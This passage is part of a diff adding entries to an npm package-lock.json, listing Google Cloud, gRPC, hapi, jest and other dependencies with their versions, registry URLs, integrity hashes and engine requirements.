"node_modules/@google-cloud/profiler/node_modules/gaxios/node_modules/https-proxy-agent": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.2.tgz", + "integrity": "sha512-NmLNjm6ucYwtcUmL7JQC1ZQ57LmHP4lT15FQ8D61nak1rO6DH+fz5qNK2Ap5UN4ZapYICE3/0KodcLYSPsPbaA==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } 
+ }, + "node_modules/@google-cloud/profiler/node_modules/gcp-metadata": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.0.0.tgz", + "integrity": "sha512-Ozxyi23/1Ar51wjUT2RDklK+3HxqDr8TLBNK8rBBFQ7T85iIGnXnVusauj06QyqCXRFZig8LZC+TUddWbndlpQ==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/google-auth-library": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.1.0.tgz", + "integrity": "sha512-1M9HdOcQNPV5BwSXqwwT238MTKodJFBxZ/V2JP397ieOLv4FjQdfYb9SooR7Mb+oUT2IJ92mLJQf804dyx0MJA==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.0.0", + "gcp-metadata": "^6.0.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/gtoken": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.0.1.tgz", + "integrity": "sha512-KcFVtoP1CVFtQu0aSk3AyAt2og66PFhZAlkUOuWKwzMLoulHXG5W5wE5xAnHb+yl3/wEFoqGW7/cDGMU8igDZQ==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/profiler/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@google-cloud/profiler/node_modules/retry-request": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-6.0.0.tgz", + "integrity": "sha512-24kaFMd3wCnT3n4uPnsQh90ZSV8OISpfTFXJ00Wi+/oD2OPrp63EQ8hznk6rhxdlpwx2QBhQSDz2Fg46ki852g==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/profiler/node_modules/teeny-request": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + 
"https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/profiler/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@google-cloud/projectify": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-2.1.1.tgz", + "integrity": "sha512-+rssMZHnlh0twl122gXY4/aCrk0G1acBqkHFfYddtsqpYXGxA29nj9V5V9SfC+GyOG00l650f6lG9KL+EpFEWQ==", + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/promisify": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-2.0.4.tgz", + "integrity": "sha512-j8yRSSqswWi1QqUGKVEKOG03Q7qOoZP6/h2zN2YO+F5h2+DHU0bSrHCK9Y7lo2DI9fBd8qGAw795sf+3Jva4yA==", + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/secret-manager": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/@google-cloud/secret-manager/-/secret-manager-5.6.0.tgz", + "integrity": "sha512-0daW/OXQEVc6VQKPyJTQNyD+563I/TYQ7GCQJx4dq3lB666R9FUPvqHx9b/o/qQtZ5pfuoCbGZl3krpxgTSW8Q==", + "dependencies": { + "google-gax": "^4.0.3" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/storage": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/@google-cloud/storage/-/storage-6.10.1.tgz", + "integrity": "sha512-EtLlT0YbXtrbUxaNbEfTyTytrjELtl4i42flf8COg+Hu5+apdNjsFO9XEY39wshxAuVjLf4fCSm7GTSW+BD3gQ==", + "dependencies": { + "@google-cloud/paginator": "^3.0.7", + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "abort-controller": "^3.0.0", + "async-retry": "^1.3.3", + "compressible": "^2.0.12", + "duplexify": "^4.0.0", + "ent": "^2.2.0", + "extend": "^3.0.2", + "gaxios": "^5.0.0", + "google-auth-library": "^8.0.1", + "mime": "^3.0.0", + "mime-types": "^2.0.8", + "p-limit": "^3.0.1", + "retry-request": "^5.0.0", + "teeny-request": "^8.0.0", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/@google-cloud/projectify": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-3.0.0.tgz", + "integrity": "sha512-HRkZsNmjScY6Li8/kb70wjGlDDyLkVk3KvoEo9uIoxSjYLJasGiCch9+PqRVDOCGUFvEIqyogl+BeqILL4OJHA==", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/@google-cloud/promisify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-3.0.1.tgz", + "integrity": "sha512-z1CjRjtQyBOYL+5Qr9DdYIfrdLBe746jRTYfaYU6MeXkqp7UfYs/jX16lFFVzZ7PGEJvqZNqYUEtb1mvDww4pA==", + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/google-auth-library": { + "version": "8.7.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.7.0.tgz", + "integrity": 
"sha512-1M0NG5VDIvJZEnstHbRdckLZESoJwguinwN8Dhae0j2ZKIQFIV63zxm6Fo6nM4xkgqUr2bbMtV5Dgo+Hy6oo0Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.0.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/storage/node_modules/mime": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-3.0.0.tgz", + "integrity": "sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/retry-request": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-5.0.2.tgz", + "integrity": "sha512-wfI3pk7EE80lCIXprqh7ym48IHYdwmAAzESdbU8Q9l7pnRCk9LEhpbOTNKjz6FARLm/Bl5m+4F0ABxOkYUujSQ==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/teeny-request": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-8.0.2.tgz", + "integrity": "sha512-34pe0a4zASseXZCKdeTiIZqSKA8ETHb1EwItZr01PAR3CLPojeAKgSjzeNS4373gi59hNulyDrPKEbh2zO9sCg==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/teeny-request/node_modules/uuid": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.0.tgz", + "integrity": "sha512-MXcSTerfPa4uqyzStbRoTgt5XIe3x5+42+q1sDuy3R5MDk66URdLMOZe5aPX/SQd+kuYAh0FdP/pO28IkQyTeg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/storage/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/storage/node_modules/yallist": { 
+ "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@grpc/grpc-js": { + "version": "1.8.22", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.8.22.tgz", + "integrity": "sha512-oAjDdN7fzbUi+4hZjKG96MR6KTEubAeMpQEb+77qy+3r0Ua5xTFuie6JOLr4ZZgl5g+W5/uRTS2M1V8mVAFPuA==", + "dependencies": { + "@grpc/proto-loader": "^0.7.0", + "@types/node": ">=12.12.47" + }, + "engines": { + "node": "^8.13.0 || >=10.10.0" + } + }, + "node_modules/@grpc/proto-loader": { + "version": "0.7.13", + "resolved": "https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.13.tgz", + "integrity": "sha512-AiXO/bfe9bmxBjxxtYxFAXGZvMaN5s8kO+jBHAJCON8rJoB5YS/D6X7ZNc6XQkuHNmyl4CYaMI1fJ/Gn27RGGw==", + "dependencies": { + "lodash.camelcase": "^4.3.0", + "long": "^5.0.0", + "protobufjs": "^7.2.5", + "yargs": "^17.7.2" + }, + "bin": { + "proto-loader-gen-types": "build/bin/proto-loader-gen-types.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/@gulpjs/to-absolute-glob": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@gulpjs/to-absolute-glob/-/to-absolute-glob-4.0.0.tgz", + "integrity": "sha512-kjotm7XJrJ6v+7knhPaRgaT6q8F8K2jiafwYdNHLzmV0uGLuZY43FK6smNSHUPrhq5kX2slCUy+RGG/xGqmIKA==", + "dev": true, + "dependencies": { + "is-negated-glob": "^1.0.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/@hapi/b64": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@hapi/b64/-/b64-5.0.0.tgz", + "integrity": "sha512-ngu0tSEmrezoiIaNGG6rRvKOUkUuDdf4XTPnONHGYfSGRmDqPZX5oJL6HAdKTo1UQHECbdB4OzhWrfgVppjHUw==", + "dependencies": { + "@hapi/hoek": "9.x.x" + } + }, + "node_modules/@hapi/boom": { + "version": "9.1.4", + "resolved": "https://registry.npmjs.org/@hapi/boom/-/boom-9.1.4.tgz", + "integrity": "sha512-Ls1oH8jaN1vNsqcaHVYJrKmgMcKsC1wcp8bujvXrHaAqD2iDYq3HoOwsxwo09Cuda5R5nC0o0IxlrlTuvPuzSw==", + "dependencies": { + "@hapi/hoek": "9.x.x" + } + }, + "node_modules/@hapi/cryptiles": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@hapi/cryptiles/-/cryptiles-5.1.0.tgz", + "integrity": "sha512-fo9+d1Ba5/FIoMySfMqPBR/7Pa29J2RsiPrl7bkwo5W5o+AN1dAYQRi4SPrPwwVxVGKjgLOEWrsvt1BonJSfLA==", + "dependencies": { + "@hapi/boom": "9.x.x" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@hapi/hoek": { + "version": "9.3.0", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-9.3.0.tgz", + "integrity": "sha512-/c6rf4UJlmHlC9b5BaNvzAcFv7HZ2QHaV0D4/HNlBdvFnvQq8RI4kYdhyPCl7Xj+oWvTWQ8ujhqS53LIgAe6KQ==" + }, + "node_modules/@hapi/iron": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/@hapi/iron/-/iron-6.0.0.tgz", + "integrity": "sha512-zvGvWDufiTGpTJPG1Y/McN8UqWBu0k/xs/7l++HVU535NLHXsHhy54cfEMdW7EjwKfbBfM9Xy25FmTiobb7Hvw==", + "dependencies": { + "@hapi/b64": "5.x.x", + "@hapi/boom": "9.x.x", + "@hapi/bourne": "2.x.x", + "@hapi/cryptiles": "5.x.x", + "@hapi/hoek": "9.x.x" + } + }, + "node_modules/@hapi/iron/node_modules/@hapi/bourne": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-2.1.0.tgz", + "integrity": "sha512-i1BpaNDVLJdRBEKeJWkVO6tYX6DMFBuwMhSuWqLsY4ufeTKGVuV5rBsUhxPayXqnnWHgXUAmWK16H/ykO5Wj4Q==" + }, + "node_modules/@hapi/podium": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/@hapi/podium/-/podium-4.1.3.tgz", + "integrity": 
"sha512-ljsKGQzLkFqnQxE7qeanvgGj4dejnciErYd30dbrYzUOF/FyS/DOF97qcrT3bhoVwCYmxa6PEMhxfCPlnUcD2g==", + "dependencies": { + "@hapi/hoek": "9.x.x", + "@hapi/teamwork": "5.x.x", + "@hapi/validate": "1.x.x" + } + }, + "node_modules/@hapi/teamwork": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@hapi/teamwork/-/teamwork-5.1.1.tgz", + "integrity": "sha512-1oPx9AE5TIv+V6Ih54RP9lTZBso3rP8j4Xhb6iSVwPXtAM+sDopl5TFMv5Paw73UnpZJ9gjcrTE1BXrWt9eQrg==", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@hapi/topo": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@hapi/topo/-/topo-5.1.0.tgz", + "integrity": "sha512-foQZKJig7Ob0BMAYBfcJk8d77QtOe7Wo4ox7ff1lQYoNNAb6jwcY1ncdoy2e9wQZzvNy7ODZCYJkK8kzmcAnAg==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@hapi/validate": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@hapi/validate/-/validate-1.1.3.tgz", + "integrity": "sha512-/XMR0N0wjw0Twzq2pQOzPBZlDzkekGcoCtzO314BpIEsbXdYGthQUbxgkGDf4nhk1+IPDAsXqWjMohRQYO06UA==", + "dependencies": { + "@hapi/hoek": "^9.0.0", + "@hapi/topo": "^5.0.0" + } + }, + "node_modules/@hapi/wreck": { + "version": "18.0.1", + "resolved": "https://registry.npmjs.org/@hapi/wreck/-/wreck-18.0.1.tgz", + "integrity": "sha512-OLHER70+rZxvDl75xq3xXOfd3e8XIvz8fWY0dqg92UvhZ29zo24vQgfqgHSYhB5ZiuFpSLeriOisAlxAo/1jWg==", + "dependencies": { + "@hapi/boom": "^10.0.1", + "@hapi/bourne": "^3.0.0", + "@hapi/hoek": "^11.0.2" + } + }, + "node_modules/@hapi/wreck/node_modules/@hapi/boom": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@hapi/boom/-/boom-10.0.1.tgz", + "integrity": "sha512-ERcCZaEjdH3OgSJlyjVk8pHIFeus91CjKP3v+MpgBNp5IvGzP2l/bRiD78nqYcKPaZdbKkK5vDBVPd2ohHBlsA==", + "dependencies": { + "@hapi/hoek": "^11.0.2" + } + }, + "node_modules/@hapi/wreck/node_modules/@hapi/bourne": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@hapi/bourne/-/bourne-3.0.0.tgz", + "integrity": "sha512-Waj1cwPXJDucOib4a3bAISsKJVb15MKi9IvmTI/7ssVEm6sywXGjVJDhl6/umt1pK1ZS7PacXU3A1PmFKHEZ2w==" + }, + "node_modules/@hapi/wreck/node_modules/@hapi/hoek": { + "version": "11.0.2", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-11.0.2.tgz", + "integrity": "sha512-aKmlCO57XFZ26wso4rJsW4oTUnrgTFw2jh3io7CAtO9w4UltBNwRXvXIVzzyfkaaLRo3nluP/19msA8vDUUuKw==" + }, + "node_modules/@humanwhocodes/config-array": { + "version": "0.11.14", + "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.14.tgz", + "integrity": "sha512-3T8LkOmg45BV5FICb15QQMsyUSWrQ8AygVfC7ZG32zOalnqrilm018ZVCw0eapXux8FtA33q8PSRSstjee3jSg==", + "dependencies": { + "@humanwhocodes/object-schema": "^2.0.2", + "debug": "^4.3.1", + "minimatch": "^3.0.5" + }, + "engines": { + "node": ">=10.10.0" + } + }, + "node_modules/@humanwhocodes/config-array/node_modules/@humanwhocodes/object-schema": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-2.0.3.tgz", + "integrity": "sha512-93zYdMES/c1D69yZiKDBj0V24vqNzB/koF26KPaagAfd3P/4gUlh3Dys5ogAK+Exi9QyzlD8x/08Zt7wIKcDcA==" + }, + "node_modules/@humanwhocodes/module-importer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", + "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", + "engines": { + "node": ">=12.22" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, + 
"node_modules/@humanwhocodes/object-schema": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", + "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", + "dev": true + }, + "node_modules/@icons/material": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/@icons/material/-/material-0.2.4.tgz", + "integrity": "sha512-QPcGmICAPbGLGb6F/yNf/KzKqvFx8z5qx3D1yFqVAjoFmXK35EgyW+cJ57Te3CNsmzblwtzakLGFqHPqrfb4Tw==", + "dev": true, + "peerDependencies": { + "react": "*" + } + }, + "node_modules/@ioredis/commands": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@ioredis/commands/-/commands-1.2.0.tgz", + "integrity": "sha512-Sx1pU8EM64o2BrqNpEO1CNLtKQwyhuXuqyfH7oGKCk+1a33d2r5saW8zNwm3j6BTExtjrv2BxTgzzkMwts6vGg==", + "license": "MIT" + }, + "node_modules/@isaacs/cliui": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", + "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", + "dev": true, + "dependencies": { + "string-width": "^5.1.2", + "string-width-cjs": "npm:string-width@^4.2.0", + "strip-ansi": "^7.0.1", + "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", + "wrap-ansi": "^8.1.0", + "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@isaacs/cliui/node_modules/ansi-regex": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", + "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/ansi-regex?sponsor=1" + } + }, + "node_modules/@isaacs/cliui/node_modules/ansi-styles": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", + "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@isaacs/cliui/node_modules/emoji-regex": { + "version": "9.2.2", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", + "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==", + "dev": true + }, + "node_modules/@isaacs/cliui/node_modules/string-width": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", + "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", + "dev": true, + "dependencies": { + "eastasianwidth": "^0.2.0", + "emoji-regex": "^9.2.2", + "strip-ansi": "^7.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@isaacs/cliui/node_modules/strip-ansi": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", + "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "dev": true, + "dependencies": { + "ansi-regex": "^6.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/strip-ansi?sponsor=1" + } + }, + 
"node_modules/@isaacs/cliui/node_modules/wrap-ansi": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", + "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^6.1.0", + "string-width": "^5.0.1", + "strip-ansi": "^7.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/@isomorphic-git/idb-keyval": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/@isomorphic-git/idb-keyval/-/idb-keyval-3.3.2.tgz", + "integrity": "sha512-r8/AdpiS0/WJCNR/t/gsgL+M8NMVj/ek7s60uz3LmpCaTF2mEVlZJlB01ZzalgYzRLXwSPC92o+pdzjM7PN/pA==", + "dev": true, + "license": "Apache-2.0" + }, + "node_modules/@isomorphic-git/lightning-fs": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/@isomorphic-git/lightning-fs/-/lightning-fs-4.6.0.tgz", + "integrity": "sha512-tfon8f1h6LawjFI/d8lZPWRPTxmdvyTMbkT/j5yo6dB0hALhKw5D9JsdCcUu/D1pAcMMiU7GZFDsDGqylerr7g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@isomorphic-git/idb-keyval": "3.3.2", + "isomorphic-textencoder": "1.0.1", + "just-debounce-it": "1.1.0", + "just-once": "1.1.0" + }, + "bin": { + "superblocktxt": "src/superblocktxt.js" + } + }, + "node_modules/@istanbuljs/schema": { + "version": "0.1.3", + "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", + "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@jest/schemas": { + "version": "29.6.3", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", + "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, + "dependencies": { + "@sinclair/typebox": "^0.27.8" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/@jest/types": { + "version": "29.6.3", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", + "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", + "dev": true, + "dependencies": { + "@jest/schemas": "^29.6.3", + "@types/istanbul-lib-coverage": "^2.0.0", + "@types/istanbul-reports": "^3.0.0", + "@types/node": "*", + "@types/yargs": "^17.0.8", + "chalk": "^4.0.0" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/@jest/types/node_modules/ansi-styles": { + 